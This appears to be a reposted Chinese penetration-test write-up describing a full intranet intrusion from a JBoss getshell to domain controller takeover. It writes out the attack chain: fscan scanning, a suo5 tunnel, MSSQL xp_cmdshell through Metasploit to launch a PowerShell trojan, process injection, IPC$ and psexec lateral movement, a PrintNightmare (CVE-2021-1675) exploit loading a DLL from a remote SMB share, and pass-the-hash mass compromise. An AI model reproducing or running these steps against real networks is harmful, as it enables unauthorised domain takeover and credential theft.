前言:
这个周主要任务就是摸鱼,所以有时间来更新一些实战的内网渗透,本文主要讲一个不出网渗透和两个拿域控的方法,内容比较简单。
getshell:
目标存在jboss漏洞,可直接getshell
这里不多说。
信息收集:
先用fscan扫一下这个地址段:
fscan.exe -h 1.1.1.1/16
fscan.exe -h 1.1.1.1/16 -m netbios这里说一下,扫描之后先挖掘重要的内容,最常见的就是先发现里面的一些集权设备,比如域,venceter等。
后面的这些弱口令,nday啥的可以配合这些环境来合理运用。
对扫描结果分析目标存在域环境:
接下来我还是对这个域环境进行渗透,本次对域环境渗透主要用两个方法,个人感觉比较不错。
不出网代理:
判断目标主机不出网
这个时候还是想着把流量代理出来,我们常用rege工具,这个也是最常用的,比较好。
最近看到了一个新出的不出网代理的脚本suo5,这个速度挺快的,我是用这个来做代理的
将suo5.jsp上传到目标服务器
在服务器上启动suo5脚本:(socks5协议)
./suo5 -t http://x.x.x.x/suo5.jsp -l 本地ip:本地端口 
如图启动成功,连接本地的socks代理即可使用。
上线第一台域主机:
回头看fscan扫描的结果,发现有一个mssql数据库:
对比该地址发现该地址在域内
这里我利用msf执行xpcmdshell
启动msf,注意这里用代理启动:
proxychains msfconsole执行xpcmdshell:
use auxiliary/admin/mssql/mssql_exec
set rhosts
set rport
set cmd cmd.exe /c powershell木马
run
就毫无悬念的上线了
打域控:
方法一:
这里查看进程,发现了有域管进程:
这里直接注入该进程上线:(这里忘记截图了)
这里有了域管理员权限之后,就能直接与域控建立ipc连接,无需密码,不要知道为啥,记住就行了。
域内信息收集得到域控:
shell net view /domain 查看当前域环境
net group "Domain Admins" /domain 查询域管理员账户
net group "Domain Controllers" /domain 查询域控制器
netdom query pdc #查看主域控制器
获得了3个域控:
分别ping这几个域控得到地址
域控一: 192.168.1.182
域控二:192.168.1.3
域控三:192.168.1.253
主域控制器:192.168.1.182与域控建立连接:
用域管权限直接与这3个域控建立ipc连接:
shell net use \192.168.1.182c$
shell net use \192.168.1.3c$
shell net use \192.168.1.253c$
shell net use
可以看到直接与他们建立了ipc连接,而且没有密码就可以。
批量上线域控:
既然与域控建立连接,那么上线也就很容易了。
先利用这个域主机做个转发:
点击视图。里面有一个添加主机
将这3个域控主机添加上去
然后全选,右键横向移动,选择psexec:
勾选这个按钮,然后选择监听器,会话选择域管理员会话,然后就能上线了
这里上线两台,不过已经够了。
方法二:
这里利用cve-2021-1675这个漏洞来打,这个漏洞基本也是通杀的,利用这个漏洞提权也是很不错的,有想法的师傅可以自己去研究一下。
前提:
获取任意域用户密码:
这个漏洞一般分两步,第一步是要开启一个smb,第二步是利用脚本打一个dll过去。
开启smb:
这里利用一个师傅的bat脚本开启smb,直接在sqlserver这台机器上开启:
随便建立一个目录:
mkdir C:userstest项目地址:https://github.com/NyDubh3/AnonymousSMBServer
开启smb:
smb.bat enable C:userstest
cs生成dll脚本放到C:userstest目录下,访问 ip地址smb就可以了
利用脚本打过去:https://github.com/cube0x0/CVE-2021-1675
proxychains python3 CVE-2021-1675.py 域名子/域用户:密码@域控 '\smb地址smbbind.dll'
成功上线域控。
PS:
这个脚本好像是一次性的,打一次过去之后,打印机服务会自动关闭,不太确定。
当然还可以利用mimiakatz打这个漏洞,有兴趣的师傅可以自行去复现。
关闭smb服务:
smb.bat disable C:userstest
批量上线主机:
最后来一个批量主机上线来玩一下,纯属娱乐:
上线之前先将445端口的主机ip地址提取出来,放到txt里面:
这里有一个导入功能,将txt导入进去
这里以administrator的hash密码来做一个pth攻击,直接PTH
效果如图:
后面的权限维持抓密码什么的就不做了,方面前面文章介绍的有。
总结:
本篇文章总体下来还是比较容易理解的,第一个点就是不出网代理,我用的是suo5这个工具,这个用起来确实很快,比较推荐。
第二个就是打域控的方法,方法一确实很快,这也是我们在拿到普通域用户system时一定要先看有没有域管进程,直接注入拿域控确实很快。方法二也是我认为比较好的方法,不仅域环境提权好用,工作组也挺好用,基本通杀。
原文始发于微信公众号(哈拉少安全小队):记一次不出网渗透打到域控
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论